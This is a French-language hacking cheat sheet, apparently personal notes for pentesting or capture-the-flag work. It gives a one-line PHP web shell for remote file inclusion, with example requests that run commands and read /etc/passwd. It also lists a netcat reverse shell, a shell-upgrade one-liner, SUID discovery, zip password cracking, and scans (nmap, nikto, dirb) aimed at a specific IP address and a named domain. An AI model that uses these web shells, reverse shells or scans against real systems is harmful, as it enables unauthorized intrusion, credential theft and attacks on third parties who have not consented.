sécuritée
| remote file inclusion | ||||
|---|---|---|---|---|
| Remote File Inclusion (RFI) est un type de vulnérabilité trouvé le plus souvent sur des sites web. Il permet à un attaquant d'inclure un fichier distant, généralement par le biais d'un script sur le serveur web. La vulnérabilité est due à l'utilisation de l'entrée fournie par l'utilisateur sans validation adéquate | ||||
| file img.php : ################### <?php system($_GET['phoenix']); ?> | permet d'executer une commande sur le site cible | url?phoenix=id url?phoenix=cat%20../../../../etc/passwd | ||
| Quelques commandes utiles | ||||
|---|---|---|---|---|
| nmap [ip] -sP -e [interface] | connaitre les hotes sur le réseau | |||
| nmap -An -p 1-65535 [ip] | connaitre les port ouvert d'une machine | |||
| pdftotext | transforme un pdf en texte dans le paquet poppler | |||
| netstat -plants | affiches les connexions | |||
| binwalk -h | stegaographic tools | |||
| foremost | recuperer des fichiers caches | |||
| strings | affiche toutes les chaines de caractere d'un fichier | |||
| exrex | permet de génerer toutes les possibilite sur une chaine | |||
| zsteg | steganographie tools exemple : zsteg b1,rgb,lsb,y | |||
| xxd | convertisseur hexadecimal | |||
| nikto -url 82.65.105.229 | permet de connaitre la version d'apache | |||
| dirb http://www.domotrix.fr | mapper un site | |||
| https://gtfobins.github.io/# | permet l'escalade de privilege | |||
| python -m SimpleHTTPServer | cree un serveur python petit | |||
| brainfuck | ||||
| https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/ | escalade de privilege | |||
| https://www.shodan.io/ | liste des version vulnerables port:22 libssh country="FR" | |||
| arp-scan -l | permet de voir les hotes du reseau | |||
| find / -perm -u=s -type f 2>/dev/null | permet de voir les fichier ou le sticky bit est positionnee | |||
| url?cmd=nc -lnvp 1234 | ouvre uneconnexion sur le port 1234 | |||
| nc -e /bin/bash <ip> <port> | ouvre une connection | |||
| pidof | connaitre le nom d'un processus | |||
| fg | foreground | |||
| bg | background | |||
| uname -a | avoir les information sur la version | |||
| python -c 'import pty;pty.spawn("/bin/bash")' | ||||
| fcrackzip | craquer les mot de passes zip | |||
#!/bin/bash | ||||
| openssl openssl x509 -inform DER -in <fichier> -text | pour lire un certificat | |||
| echo "net.ipv4.icmp_echo_ignore_all = 1" >> /etc/sysctl.conf | bloquer la réponse au ping | |||
$ find / -name "word"
$ grep -r -i word ./
$ sed '/debut/,/fin/ s/.*//' fichier
$ grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}"
$ python -c 'import pty;pty.spawn("/bin/bash")'
$ python -m SimpleHTTPServer
$ python3 -m http.server
$ for i in {0..10}; do echo "$i"; done
$ nc -e /bin/bash